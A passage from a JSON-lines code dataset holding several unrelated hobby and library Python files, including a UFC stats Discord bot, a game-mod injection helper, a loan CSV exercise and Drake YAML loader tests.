'GaussianNB'],\n [GradientBoostingClassifier(), 'GradientBoostingClassifier'],\n [RandomForestClassifier(), 'RandomForestClassifier'],\n [AdaBoostClassifier(), 'AdaBoostClassifier']]\nmodel_score=[]\nfor a in algo:\n model = a[0]\n #Step2 : fit model\n model.fit(x_train, y_train)\n #step3:predict\n y_pre = model.predict(x_test)\n #step4 :Score\n score = model.score(x_test, y_test)\n model_score.append([score,a[1]])\n print(f'{a[1]}score={score}')\n print(metrics.confusion_matrix(y_test, y_pre))\n print(metrics.classification_report(y_test, y_pre))\n print('----------------------------'*3)\nprint(model_score)\ndscore = pd.DataFrame(model_score, columns=['score','Model Classifier'])\n# print(dscore)\nprint(dscore.sort_values('score',ascending=False))\n","repo_name":"Aunch009/Machine_learning_study","sub_path":"machine_learing_muti_cassification.py","file_name":"machine_learing_muti_cassification.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42391967367","text":"import os\nfrom bs4 import BeautifulSoup\nimport requests \nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = commands.Bot(command_prefix='$')\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\nURL = 'http://statleaders.ufc.com/'\n\ndef ufc_table(ID): \n mes = ''\n mes += '```'\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, 'html.parser')\n total_fight_table = soup.find('article', id= ID, class_='results-group Fights-group')\n rows = total_fight_table.find_all('div', class_='results-table--tr')[1::]\n headers = total_fight_table.find_all('div', class_='results-table--tr')[0]\n row_titles = headers('span')\n header_text = [row_titles[0].get_text(), row_titles[1].get_text(),row_titles[2].get_text()]\n mes += '\\n' + header_text[0]\n for head in header_text[1:]: \n mes += '\\t' + head \n for fighter in rows: \n name = fighter.a.text\n link = fighter.a['href']\n stats = fighter('span')\n rank = stats[0].get_text()\n points = stats[2].get_text()\n mes += '\\n' + rank + '\\t' + name + '\\t' + points\n mes += '\\n' + '```'\n return mes\n\n@client.command(name = 'totalfights')\nasync def total_fights_display(com): \n table = ufc_table(\"TotalFights-group\")\n await com.send(table)\n\n@client.command(name = 'wins')\nasync def wins_display(com): \n table = ufc_table(\"Wins-group\")\n await com.send(table)\n\n@client.command(name = \"fin\")\nasync def finish_display(com): \n table = ufc_table(\"Finishes-group\")\n await com.send(table)\n\n@client.command(name = \"ko\")\nasync def ko_display(com): \n table = ufc_table(\"KOTKOWins-group\")\n await com.send(table)\n\n@client.command(name = \"sub\")\nasync def sub_display(com): \n table = ufc_table(\"SubmissionWins-group\")\n await com.send(table)\n\n@client.command(name = \"decision\")\nasync def decision_display(com): \n table = ufc_table(\"DecisionWins-group\")\n await com.send(table)\n\n@client.command(name = \"streak\")\nasync def streak_display(com): \n table = ufc_table(\"WinStreak-group\")\n await com.send(table)\n\n@client.command(name = \"titles\")\nasync def titles_display(com): \n table = ufc_table(\"TitleFightWins-group\")\n await com.send(table)\n\n@client.command(name = \"awards\")\nasync def awards_display(com): \n table = ufc_table(\"TotalAwards-group\")\n await com.send(table)\n\nJBPATH = os.getenv('GIF_PATH')\n\n@client.command()\nasync def jb(ctx): \n file = discord.File(JBPATH, filename = 'justbleedguy.gif')\n bleed = discord.Embed(\n title = 'JUST BLEEEEED', \n colour = discord.Colour.red()\n )\n bleed.set_image(url = 'attachment://justbleedguy.gif') \n await ctx.send(file = file, embed=bleed)\n\nclient.run(TOKEN)","repo_name":"SxChen97/UFCStats","sub_path":"ufc_leaderboard_bot.py","file_name":"ufc_leaderboard_bot.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5161600807","text":"#12: Darren Zou & Darren Liang\na = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n\ndef pigLatin (word):\n for vowels in a:\n if word[0].lower() == vowels:\n return word + \"ay\"\n else:\n return word[1:] + word[0] + \"ay\"\n \n \n \nprint(pigLatin(\"apwple\"))\nprint(pigLatin(\"cake\"))\n","repo_name":"Darren120/csci127-assignments","sub_path":"hw_02/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33475112325","text":"from aiogram.types import User, Chat\n\nTEST_USER = User(id=123, is_bot=False, first_name='Test', last_name='Bot',\n username='testtest', language_code='ru-RU', is_premium=None,\n added_to_attachment_menu=None, can_join_groups=None,\n can_read_all_group_messages=None, supports_inline_queries=None)\n\nTEST_USER_CHAT = Chat(id=333, type='private', title=None,\n username=TEST_USER.username, first_name=TEST_USER.first_name,\n last_name=TEST_USER.last_name, is_forum=None,\n photo=None, active_usernames=None,\n emoji_status_custom_emoji_id=None, bio=None,\n has_private_forwards=None, has_restricted_voice_and_video_messages=None,\n join_to_send_messages=None, join_by_request=None,\n description=None, invite_link=None,\n pinned_message=None, permissions=None,\n slow_mode_delay=None, message_auto_delete_time=None,\n has_aggressive_anti_spam_enabled=None, has_hidden_members=None,\n has_protected_content=None, sticker_set_name=None,\n can_set_sticker_set=None, linked_chat_id=None,\n location=None)\n","repo_name":"lizonn/healthy-food-bot","sub_path":"tests/bot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21143304979","text":"import struct\nimport time\nimport socket\nimport subprocess\nimport atexit\n\nclass InjectionAPI:\n injector_filepath = \"C:/Program Files (x86)/Steam/steamapps/workshop/content/387990/1771470800/sminject.exe\"\n\n def __init__(self):\n self.subprocess = None\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n self.address = ('127.0.0.1', 25752)\n\n self.socket.settimeout(0.001) #1 second timeout\n\n def start(self):\n try:\n self.subprocess = subprocess.Popen(InjectionAPI.injector_filepath)\n\n time.sleep(0.5)\n if self.subprocess.poll() != None: #subprocess return None if alive\n print(\"Error polling subprocess.\")\n return -1\n\n self.scan()\n self.poll()\n\n atexit.register(self.cleanup)\n\n except OSError as err:\n print(err)\n\n def cleanup(self):\n if self.subprocess and self.subprocess.poll() == None:\n self.subprocess.kill()\n\n def scan(self):\n self.socket.sendto(struct.pack(\">B\", 0x03), self.address)\n\n def poll(self):\n self.socket.sendto(struct.pack(\">B\", 0x04), self.address)\n\n def set_value(self, id, value):\n packet = bytearray(b'\\x01')\n packet.extend(struct.pack(\">Id\", id, value))\n self.socket.sendto(packet, self.address)\n\n def ask_value(self, ids):\n packet = bytearray(b'\\x02')\n for id in ids:\n packet.extend(struct.pack(\">I\", id))\n\n # print(\"ask_value packet: \", packet) #DEBUG\n self.socket.sendto(packet, self.address)\n\n def recv_value(self):\n try:\n data = self.socket.recv(1024)\n except socket.error:\n return []\n\n # print(\"packet data: {}\".format(data))\n\n # -1 for 0x0A byte and divide by 12 because size of channel (4byte) + value(8bytes)\n length = struct.unpack(\">h\", data[0:2])\n length = (length[0] - 1) // 12\n\n unpacked_data = struct.unpack(\">\" + \"Id\"*length, data[3:])\n # unpacked_data = struct.unpack(\">hBId\", data)\n print(unpacked_data)\n\n result = list(zip(*[iter(data)]*2))\n return result\n\n # def ask_value(self, id):\n # packet = bytearray(b'\\x02')\n # packet.extend(struct.pack(\">I\", id))\n # self.socket.sendto(packet, self.address)\n #\n # def recv_value(self):\n # # header = self.socket.recv(2)\n # data = self.socket.recv(128)\n # print(\"packet data: {}\".format(data))\n #\n # def get_value(self, id):\n # self.ask_value(id)\n # time.sleep(0.01)\n # self.recv_value()\n","repo_name":"Rafale25/python_injection_interface_SM","sub_path":"injectionAPI.py","file_name":"injectionAPI.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70741856874","text":"n = int(input())\nal = list(map(int, input().split()))\ns = sum(al)\nif s / 10 != s // 10:\n print(\"No\")\n exit()\ns //= 10\n\n# しゃくとり法を2周: 長さがsを超えた時点でleftをシフトするためrightがleftを追い越すことはない\nlength = 0\nright = 0\nfor left in range(n * 2):\n while length + al[right % n] <= s:\n length += al[right % n]\n right += 1\n if length == s:\n print(\"Yes\")\n exit()\n if left == right:\n right += 1\n else:\n length -= al[left % n]\nprint(\"No\")","repo_name":"ymsk-sky/atcoder_part3","sub_path":"typical90/076_CakeCut.py","file_name":"076_CakeCut.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9465089799","text":"# Type: Homework\n# Level: 4\n# Section: 4.3: File I/O\n# Exercise: 7\n# Description: This contains tests for Loan classes\n# Create a program which does the following:\n#\n# a. Gives the user a choice of two options: (1) Add Loan, (2) Write file and exit.\n# i. If user enters ‘1’, prompt the user for the type of Loan, its asset name/value, its face\n# amount, rate, and term. Each prompt should occur one after the other. After the\n# last prompt, save the entry into a Loan object, notify the user that the loan has been\n# recorded, and return to the main menu.\n# ii. If user enters ‘2’, loop through all the entered loans and write them to a file. The file\n# should be in extension .csv. To do this properly, each sub-entry (loan type, asset\n# name, asset value, amount, rate, and term) should be separate by a comma. Each\n# loan should be separated by a newline.\n#\n# b. To verify that your generated .csv is a valid .csv file, try opening it in Excel once it has been\n# generated. You should see six columns and the number of rows should reflect the number\n# of loans.\n\n# Importing necessary packages\nfrom loan.loanpool import LoanPool\nfrom loan.loanIO import loanDataEntry, loanReadCSV\nimport logging\n#######################\n# To enable PyCharm to create log file\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n# Setting log file config\nlogging.basicConfig(filename='log.txt', filemode='a',\n format=\"{levelname} {processName:<12} {message} ({filename}:{lineno})\", style='{')\n#######################\n\n\ndef main():\n\n logging.getLogger().setLevel(logging.DEBUG) # Set logging level\n ###############################################\n\n # Initiate variable to receive user keyboard input\n master_key = ''\n logging.debug(f'Initiate {master_key} to take user input.')\n\n loanFile = 'loansRecord.csv' # Initiate a file name variable\n\n # Initiate empty lists for export and import\n loans_writeCSV = []\n loans_readCSV = []\n\n # Master key is the 2 options user are given\n # 1 prompt for data entry\n # 2 export data to CSV file\n # 3 import data from CSV file\n # 4 Display WAR WAM of all the loans\n\n master_key = 100\n while not master_key == '0':\n master_key = input('Press\\n'\n '1 to enter loan info\\n'\n '2 to write them to CSV. (exit to view result)\\n'\n '3 to import from CSV.\\n'\n '4 to see WAR and WAM of all loans (must run #3 import first)\\n'\n '0 to exit (you will lose all progress\\n'\n 'Input = ')\n\n #######################\n # 1 Execute prompt for data entry\n if master_key == '1':\n logging.debug(f'Initiate {loans_writeCSV} to save loan info.')\n\n try:\n logging.debug(f'Calling {loanDataEntry} to take user prompt.')\n loan1 = loanDataEntry() # Call the module to enter data\n loans_writeCSV.append(loan1) # add the data entry to a list\n except Exception as Ex:\n print(f'Failed. Unknown error. {Ex}')\n pass\n else:\n logging.debug(f'Data entry successful at {loan1}')\n print(f'Loan entry successfully recorded under: {loan1}.') # Display record to user\n logging.info(f'Current loans are: {loans_writeCSV}')\n print()\n #######################\n\n #######################\n # 2 Execute prompt for CSV export\n elif master_key == '2':\n try: # block to catch if file doesn't exist\n fileExport = open(loanFile, 'a')\n except FileNotFoundError as fnfEx:\n logging.error(f'Failed. {fnfEx}')\n else:\n logging.info(f'File founded {fileExport}.')\n count = 0\n for loan in loans_writeCSV: # loop through the list to write to csv\n logging.debug(f'Writing {loan} to CSV')\n # Write to CSV\n fileExport.write(f'{loan.__class__.__name__}, {loan.asset.__class__.__name__}, '\n f'{loan.asset.initialValue}, {loan.notional}, {loan.rate}, {loan.term}\\n')\n count += 1\n print(f'Successfully exported {count} loans to {loanFile}. See log for details.')\n print()\n logging.info(f'Successfully exported {count} loans to {loanFile}.')\n logging.info(f'Exported values are: {loans_writeCSV}')\n\n #######################\n\n #######################\n # 3 Execute prompt for CSV import\n elif master_key == '3':\n import_loanFile = input('Enter filepath to import = ')\n logging.info(f'Prompt user to choose path for CSV to import. {import_loanFile}')\n\n try: # block to catch if file doesn't exist\n fileImport = open(import_loanFile, 'r')\n except FileNotFoundError as fnfEx:\n logging.error(f'Failed. {fnfEx}')\n else:\n logging.info(f'File founded. {import_loanFile}')\n # Loop through line by line\n count = 0\n for line in fileImport:\n # For each line in the file:\n # 1. Strip special characters, replace space with '' and split them to a list\n # 2. Dissect the list by calling loanReadCSV(list), which:\n # 3. Append the result to a list and/or raise any error.\n try:\n loans_readCSV.append(loanReadCSV(line.strip().replace(' ', '').split(',')))\n except ValueError as valEx:\n print(f'Failed to process a line, see log.')\n logging.error(f'Failed to process line. {valEx}')\n except Exception as Ex:\n print(f'Failed to process a line, see log.')\n logging.error(f'Failed to process line. {Ex}')\n else:\n logging.info(f'Successfully imported line.')\n count += 1\n\n print(f'Successfully imported {count} lines from {import_loanFile}. See log for details.')\n print()\n logging.info(f'Successfully imported {count} lines from {import_loanFile}.')\n logging.info(f'Imported values are: {loans_readCSV}')\n #######################\n\n #######################\n # Calculate and display WAR WAM\n # Must run #3 first\n elif master_key == '4':\n logging.debug(f'Grabbing loans from {loans_readCSV}')\n print(f' WAR = {LoanPool(loans_readCSV).WAR()}') # Instantiate LoanPool object and call WAR\n print(f' WAM = {LoanPool(loans_readCSV).WAM()}') # Instantiate LoanPool object and call WAM\n print()\n #######################\n\n ###############################################\n\n\n#######################\nif __name__ == '__main__':\n main()\n","repo_name":"jeffsnguyen/Python","sub_path":"Level_4/Homework/Section_4_3_File_IO/Exercise_8/test_loan.py","file_name":"test_loan.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13582019041","text":"import copy\nimport dataclasses as dc\nimport functools\nimport math\nfrom math import inf, nan\nimport os\nfrom pathlib import Path\nfrom textwrap import dedent\nimport typing\nimport unittest\n\nimport numpy as np\n\nfrom pydrake.common import FindResourceOrThrow\nfrom pydrake.common.test.serialize_test_util import MyData2\nfrom pydrake.common.test_utilities.meta import (\n ValueParameterizedTest,\n run_with_multiple_values,\n)\nfrom pydrake.common.value import Value\nfrom pydrake.common.yaml import yaml_dump_typed, yaml_load_typed\n\n\n# To provide test coverage for all of the special cases of YAML loading, we'll\n# define some dataclasses. These classes mimic\n# drake/common/yaml/test/example_structs.h\n# and should be roughly kept in sync with the definitions in that file.\n\n\n@dc.dataclass\nclass FloatStruct:\n value: float = nan\n\n\n@dc.dataclass\nclass StringStruct:\n value: str = \"nominal_string\"\n\n\n@dc.dataclass\nclass AllScalarsStruct:\n some_bool: bool = False\n some_float: float = nan\n some_int: int = 11\n some_str: str = \"nominal_string\"\n\n\n@dc.dataclass\nclass ListStruct:\n value: typing.List[float] = dc.field(\n default_factory=lambda: list((nan,)))\n\n\n@dc.dataclass\nclass MapStruct:\n value: typing.Dict[str, float] = dc.field(\n default_factory=lambda: dict(nominal_float=nan))\n\n\n@dc.dataclass\nclass InnerStruct:\n inner_value: float = nan\n\n\n@dc.dataclass\nclass OptionalStruct:\n value: typing.Optional[float] = nan\n\n\n@dc.dataclass\nclass OptionalStructNoDefault:\n value: typing.Optional[float] = None\n\n\n@dc.dataclass\nclass NumpyStruct:\n # TODO(jwnimmer-tri) Once we drop support for Ubuntu 20.04 \"Focal\", then we\n # can upgrade to numpy >= 1.21 as our minimum at which point we can use the\n # numpy.typing module here to constrain the shape and/or dtype.\n value: np.ndarray = dc.field(\n default_factory=lambda: np.array([nan]))\n\n\n@dc.dataclass\nclass RejectGetattrNumpyStruct:\n value: np.ndarray = dc.field(\n default_factory=lambda: np.array([nan]))\n\n def __getattribute__(self, name):\n if name == \"value\":\n # When loading fields that do not support merging (i.e., lists),\n # yaml_load_typed is careful to not call getattr on data it doesn't\n # need. Check that invariant by rejecting such access here.\n raise NotImplementedError()\n return object.__getattribute__(self, name)\n\n def _value(self):\n return self.__dict__[\"value\"]\n\n\n@dc.dataclass\nclass VariantStruct:\n value: typing.Union[str, float, FloatStruct, NumpyStruct] = nan\n\n\n@dc.dataclass\nclass NullableVariantStruct:\n value: typing.Union[None, FloatStruct, StringStruct] = None\n\n\n@dc.dataclass\nclass ListVariantStruct:\n value: typing.List[typing.Union[str, float, FloatStruct, NumpyStruct]] = (\n dc.field(default_factory=lambda: list([nan])))\n\n\n@dc.dataclass\nclass OuterStruct:\n outer_value: float = nan\n inner_struct: InnerStruct = dc.field(\n default_factory=lambda: InnerStruct())\n\n\n@dc.dataclass\nclass OuterStructOpposite:\n # N.B. The opposite member order of OuterStruct.\n inner_struct: InnerStruct = dc.field(\n default_factory=lambda: InnerStruct())\n outer_value: float = nan\n\n\n@dc.dataclass\nclass Blank:\n pass\n\n\n@dc.dataclass\nclass OuterWithBlankInner:\n outer_value: float = nan\n inner_struct: Blank = dc.field(\n default_factory=lambda: Blank())\n\n\n@dc.dataclass\nclass BigMapStruct:\n value: typing.Mapping[str, OuterStruct] = dc.field(\n default_factory=lambda: dict(\n foo=OuterStruct(\n outer_value=1.0,\n inner_struct=InnerStruct(inner_value=2.0))))\n\n\nclass TestYamlTypedRead(unittest.TestCase,\n metaclass=ValueParameterizedTest):\n \"\"\"Detailed tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_read_archive_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def _all_typed_read_options(\n sweep_allow_yaml_with_no_schema=(True, False),\n sweep_allow_schema_with_no_yaml=(True, False),\n sweep_retain_map_defaults=(True, False)):\n \"\"\"Returns the options matrix for our value-parameterized test cases.\n \"\"\"\n result = []\n for i in sweep_allow_yaml_with_no_schema:\n for j in sweep_allow_schema_with_no_yaml:\n for k in sweep_retain_map_defaults:\n result.append(dict(options=dict(\n allow_yaml_with_no_schema=i,\n allow_schema_with_no_yaml=j,\n retain_map_defaults=k,\n )))\n return result\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_float(self, *, options):\n cases = [\n (\"0\", 0.0),\n (\"1\", 1.0),\n (\"-1\", -1.0),\n (\"0.0\", 0.0),\n (\"1.2\", 1.2),\n (\"-1.2\", -1.2),\n (\"3e4\", 3e4),\n (\"3e-4\", 3e-4),\n (\"5.6e7\", 5.6e7),\n (\"5.6e-7\", 5.6e-7),\n (\"-5.6e7\", -5.6e7),\n (\"-5.6e-7\", -5.6e-7),\n (\"3E4\", 3e4),\n (\"3E-4\", 3e-4),\n (\"5.6E7\", 5.6e7),\n (\"5.6E-7\", 5.6e-7),\n (\"-5.6E7\", -5.6e7),\n (\"-5.6E-7\", -5.6e-7),\n ]\n for value, expected in cases:\n data = f\"value: {value}\"\n x = yaml_load_typed(schema=FloatStruct, data=data, **options)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_float_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=FloatStruct, data=\"{}\",\n **options)\n self.assertTrue(math.isnan(x.value), msg=repr(x.value))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=FloatStruct, data=\"{}\",\n **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_all_scalars(self, *, options):\n data = dedent(\"\"\"\n some_bool: true\n some_float: 101.0\n some_int: 102\n some_str: foo\n \"\"\")\n x = yaml_load_typed(schema=AllScalarsStruct, data=data, **options)\n self.assertEqual(x.some_bool, True)\n self.assertEqual(x.some_float, 101.0)\n self.assertEqual(x.some_int, 102)\n self.assertEqual(x.some_str, \"foo\")\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list(self, *, options):\n cases = [\n (\"[1.0, 2.0, 3.0]\", [1.0, 2.0, 3.0]),\n ]\n for value, expected in cases:\n data = f\"value: {value}\"\n x = yaml_load_typed(schema=ListStruct, data=data, **options)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=ListStruct, data=\"{}\", **options)\n self.assertTrue(len(x.value), 1)\n self.assertTrue(math.isnan(x.value[0]), msg=repr(x.value))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=ListStruct, data=\"{}\", **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_map(self, *, options):\n data = dedent(\"\"\"\n value:\n foo: 0.0\n bar: 1.0\n \"\"\")\n x = yaml_load_typed(schema=MapStruct, data=data, **options)\n expected = dict(foo=0.0, bar=1.0)\n if options[\"retain_map_defaults\"]:\n expected.update(nominal_float=nan)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_big_map_append(self, *, options):\n data = dedent(\"\"\"\n value:\n bar:\n outer_value: 3.0\n inner_struct:\n inner_value: 4.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(bar=OuterStruct(3.0, InnerStruct(4.0)))\n if options[\"retain_map_defaults\"]:\n expected.update(foo=OuterStruct(1.0, InnerStruct(2.0)))\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_new_outer_value(self, *, options):\n data = dedent(\"\"\"\n value:\n foo:\n outer_value: 3.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct(3.0))\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].inner_struct.inner_value = 2.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_new_inner_value(self, *, options):\n data = dedent(\"\"\"\n value:\n foo:\n inner_struct:\n inner_value: 4.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct(inner_struct=InnerStruct(4.0)))\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].outer_value = 1.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_empty(self, *, options):\n data = dedent(\"\"\"\n value:\n foo: {}\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct())\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].outer_value = 1.0\n expected[\"foo\"].inner_struct.inner_value = 2.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_map_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=MapStruct, data=\"{}\", **options)\n self.assertEqual(x.value, dict(nominal_float=nan))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=MapStruct, data=\"{}\", **options)\n\n # TODO(jwnimmer-tri) Add test cases similar to StdMapWithMergeKeys\n # and StdMapWithBadMergeKey from the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add test cases similar to StdMapDirectly and\n # StdMapDirectlyWithDefaults from the C++ YAML test suite.\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_optional(self, *, options):\n # The test case numbers here (1..12) reference the specification as\n # documented in the C++ unit test yaml_read_archive_test.cc.\n for schema, data, expected in (\n (OptionalStructNoDefault, \"value: 1.0\", 1.0), # Case 1, 2\n (OptionalStruct, \"value: 1.0\", 1.0), # Case 3, 4\n (OptionalStructNoDefault, \"value:\", None), # Case 5, 6\n (OptionalStruct, \"value:\", None), # Case 7, 8\n (OptionalStructNoDefault, \"{}\", None), # Case 9, 10\n (OptionalStruct, \"{}\", (\n nan if options[\"allow_schema_with_no_yaml\"] # Case 12\n else None)), # Case 11\n ):\n with self.subTest(data=data, schema=schema):\n actual = yaml_load_typed(schema=schema, data=data, **options)\n self.assertEqual(actual, schema(expected))\n if options[\"allow_yaml_with_no_schema\"]:\n if \"value:\" in data:\n amended_data = \"foo: bar\\n\" + data\n else:\n amended_data = \"foo: bar\"\n actual = yaml_load_typed(\n schema=schema, data=amended_data, **options)\n self.assertEqual(actual, schema(expected))\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant(self, *, options):\n data = \"value: foo\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(\"foo\"))\n self.assertEqual(type(x.value), str)\n\n data = \"value: !!str bar\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(\"bar\"))\n self.assertEqual(type(x.value), str)\n\n data = \"value: !!float 1.0\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(1.0))\n self.assertEqual(type(x.value), float)\n\n data = \"value: !FloatStruct { value: 1.0 }\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(FloatStruct(1.0)))\n\n data = \"value: !NumpyStruct { value: [1.0, 2.0] }\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(type(x.value), NumpyStruct)\n actual = x.value.value\n expected = np.array([1.0, 2.0])\n np.testing.assert_equal(actual, expected, verbose=True)\n\n data = \"value: !FloatStruct {}\"\n defaults = VariantStruct(FloatStruct(22.0))\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=VariantStruct, data=data,\n defaults=defaults, **options)\n self.assertEqual(x, defaults)\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=VariantStruct, data=data,\n defaults=defaults, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=VariantStruct, data=\"{}\", **options)\n self.assertTrue(math.isnan(x.value), msg=repr(x.value))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=VariantStruct, data=\"{}\", **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_found_no_tag(self, *, options):\n data = \"value:\"\n with self.assertRaisesRegex(RuntimeError, \"one of.*FloatStruct.*\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n data = \"value: [1.0, 2.0]\"\n with self.assertRaisesRegex(RuntimeError, \"str.*got.*list\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n data = \"value: { foo: bar }\"\n with self.assertRaisesRegex(RuntimeError, \"str.*got.*dict\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_found_unknown_tag(self, *, options):\n data = \"value: !UnknownTag { foo: bar }\"\n with self.assertRaisesRegex(RuntimeError, \"UnknownTag.*match\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list_variant(self, *, options):\n data = dedent(\"\"\"\n value:\n - foo\n - !!float 1.0\n - !FloatStruct { value: 2.0 }\n - !NumpyStruct { value: [3.0, 4.0] }\n \"\"\")\n x = yaml_load_typed(schema=ListVariantStruct, data=data, **options)\n self.assertEqual(len(x.value), 4)\n self.assertEqual(x.value[0], \"foo\")\n self.assertEqual(x.value[1], 1.0)\n self.assertEqual(x.value[2], FloatStruct(2.0))\n self.assertEqual(type(x.value[3]), NumpyStruct)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_vector(self, *, options):\n data = \"value: [1.0, 2.0, 3.0]\"\n expected = [1.0, 2.0, 3.0]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n data = \"value: [1.0]\"\n expected = [1.0]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n data = \"value: []\"\n expected = []\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_matrix(self, *, options):\n data = dedent(\"\"\"\n value:\n - [0.0, 1.0, 2.0, 3.0]\n - [4.0, 5.0, 6.0, 7.0]\n - [8.0, 9.0, 10.0, 11.0]\n \"\"\")\n expected = [\n [0.0, 1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0, 7.0],\n [8.0, 9.0, 10.0, 11.0],\n ]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_missing(self, *, options):\n schema = NumpyStruct\n data = \"{}\"\n expected = [nan]\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=schema, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=schema, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_no_getattr(self, *, options):\n data = \"value: [1.0]\"\n expected = [1.0]\n x = yaml_load_typed(schema=RejectGetattrNumpyStruct, data=data,\n **options)\n np.testing.assert_equal(x._value(), np.array(expected), verbose=True)\n\n 